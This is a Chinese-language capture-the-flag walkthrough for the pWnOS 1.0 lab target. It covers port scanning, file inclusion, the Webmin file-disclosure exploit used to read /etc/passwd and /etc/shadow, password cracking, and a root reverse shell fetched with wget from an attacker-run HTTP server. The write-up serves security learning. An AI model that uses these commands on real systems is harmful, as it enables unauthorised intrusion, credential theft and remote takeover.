pWnOS 1.0 靶机渗透测试详细教程

一、信息收集阶段

1. 主机存活判断

使用Nmap进行基础扫描确认目标主机存活状态：

nmap -sn 10.10.10.23

2. 快速端口扫描

使用高速扫描模式快速识别开放端口：

sudo nmap --min-rate 10000 -p- 10.10.10.23

参数说明：

• --min-rate 10000：以不低于10,000包/秒的速度扫描
• -p-：扫描所有65,535个端口

3. TCP服务扫描

对已识别的开放端口进行详细扫描：

sudo nmap -sT -sV -O -p22,80,139,445,10000 10.10.10.23

参数说明：

• -sT：TCP连接扫描
• -sV：服务版本检测
• -O：操作系统识别
• -p：指定端口范围

4. UDP服务扫描

sudo nmap -sU -p22,80,139,445,10000 10.10.10.23

参数说明：

• -sU：UDP扫描

5. 漏洞扫描

使用Nmap脚本引擎进行漏洞扫描：

sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.23

二、Web应用渗透

1. 初步访问

访问目标Web服务（端口80）：

http://10.10.10.23

2. 发现文件包含漏洞

尝试输入单引号测试SQL注入，发现返回错误信息暴露路径。

直接测试文件包含漏洞成功：

http://10.10.10.23/index1.php?help=true&connect=/etc/passwd

三、Webmin漏洞利用

1. 搜索Webmin漏洞

使用searchsploit查找Webmin相关漏洞：

searchsploit webmin

2. 下载漏洞利用脚本

searchsploit webmin -m 2017.pl

3. 利用文件泄露漏洞

sudo perl 2017.pl 10.10.10.23 10000 /etc/passwd 0

参数说明：

• 0：表示目标使用HTTP服务（非HTTPS）

4. 获取shadow文件

sudo perl 2017.pl 10.10.10.23 10000 /etc/shadow 0

四、密码破解

1. 使用John破解哈希

john hash --wordlist=/usr/share/wordlists/rockyou.txt

成功破解出凭证：vmware/h4ckm3

五、SSH访问

1. SSH连接

由于目标主机SSH配置问题，需要指定密钥算法：

sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.23

六、权限提升

1. 系统信息收集

uname -a
sudo -l
cat /etc/crontab

2. 准备反弹Shell

在攻击机上准备反弹Shell脚本：

cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi

编辑shell.cgi，修改其中的IP和端口为攻击机监听地址。

3. 搭建HTTP服务

php -S 0.0.0.0:8080

4. 目标机下载Shell

在目标机上执行：

wget http://10.10.10.20:8080/shell.cgi
chmod +x shell.cgi

5. 通过Webmin触发Shell

再次利用Webmin漏洞触发下载的Shell：

sudo perl 2017.pl 10.10.10.23 10000 /home/vmware/shell.cgi 0

6. 获取Root权限

在攻击机监听对应端口，成功获取root权限的Shell。

七、总结

本靶机渗透测试流程：

1. 通过Nmap全面扫描发现开放服务
2. 发现Web应用的文件包含漏洞
3. 利用Webmin的文件泄露漏洞获取敏感文件
4. 破解shadow文件获取SSH凭证
5. 通过特殊参数连接SSH
6. 利用Webmin的高权限执行反弹Shell获取root权限

关键点：

• Webmin的文件泄露漏洞利用
• 密码哈希破解
• SSH连接的特殊处理
• 利用高权限服务进行权限提升